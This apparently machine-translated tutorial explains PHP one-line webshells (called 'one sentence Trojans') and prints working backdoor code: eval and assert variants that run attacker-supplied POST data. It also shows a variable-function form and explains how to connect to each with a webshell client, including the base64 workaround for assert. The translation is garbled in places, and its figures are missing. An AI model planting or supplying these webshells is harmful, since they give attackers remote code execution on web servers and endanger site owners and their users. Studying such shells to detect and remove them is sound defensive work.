What is a one sentence Trojan horse

In a word, a Trojan horse is a Trojan horse that only needs one line of code , Just one line of code , It can achieve the same function as Malaysia . In order to bypass waf Detection of , In a word, the Trojan horse has been transformed in countless ways , But the essence is the same ： The Trojan's function executed the command we sent .

In a word, the principle of Trojan horse

We can go through GET 、POST 、COOKIE These three ways to submit data to a website , In a word, Trojan horse can be used $_GET[’ ‘]、$_POST[’ ‘]、$_COOKIE[’ '] Receive the data we send , And pass the received data to the function executing the command in the Trojan horse , And then execute the order .
Therefore, most of the classic sentence Trojans have only two parts , One is the function part that can execute code , One is the part that receives data .

for example ：
<?php eval(@$_POST['a']); ?>
<?php assert(@$_POST['a']); ?>

among eval It's the function that executes the command $_ POST['a'] It's the received data .eval Function takes the received data as PHP Code to execute . In this way, we can let the website with a sentence inserted into the Trojan horse execute whatever we passed in the past PHP sentence . This is the strength of the Trojan horse .

Example :

phpinfo.png

Because the Trojan horse is receiving post In request “a” The data of （ $_POST[‘a’]）, So we have to post Method sends data and assigns the code we want to execute to “a”. If you put the horse post Replace with get, Then we need to GET Method to send “a”,（ Just like this. ： http://127.0.0.1/test.php?a=phpinfo(); ） I won't show it again .

A special sentence Trojan horse

Normally, a common sentence is that Trojans are directly used in the above examples eval function
If you give a sentence in this form, Trojan horse , How to use webshell To connect
<?php $_POST['1']($_POST['2']); ?>

Then from eval and assert Two different function features to specify

If you want to pass eval Function to complete the sentence of a Trojan horse , Not directly 1=eval&2 Connect in this format


As shown in the figure, you will be prompted that the return data is empty , as a result of eval It's a language constructor, not a function , Can not be Variable function call .

PHP Support the concept of variable function . This means that if a variable name is followed by parentheses ,PHP Will look for a function with the same name as the value of the variable , And try to execute it . Variable functions can be used to implement, including callback functions , Some uses, including function tables .

Mutable functions cannot be used, for example echo,print,unset(),isset(),empty(),include,require And similar language structures . You need to use your own wrapper functions to use these structures as variable functions .

So it seems eval In fact, it is not ‘ function ’, It is PHP Its own language structure , If you need to use ‘ variable ’ Method call , You need to build it yourself , Something like this ：

<?php
function eval_1($str)
{
    
   eval($str);
}
 
$a='eval_1';
$a('phpinfo()');
?> 

So we need to execute functions with other commands, such as assert To achieve
use 1=assert(eval&2) Finally, it's converted to php The code is assert(eval($POST_['2']))

As shown in the figure, the test is successful
Be careful ： Pay attention to use when testing php Version of , If the version used exceeds 7.1 The connection will fail .
The reason is

Or use it directly 1=assert&2 To connect , However, it should be noted that the connection needs to be selected base64 In the form of connection

because assert stay php Is considered a function
Analyze the two coding modes

base64

default What is executed is our string , So the execution failed

Through packet capturing analysis, we can see why we implemented base64 It's a successful link again , Because we have one more eval function , In essence, we are implementing assert(eval()), So it's executable , We must be clear , our eval The argument in the function is the character ,assert The argument in the function is an expression （ Or a function ）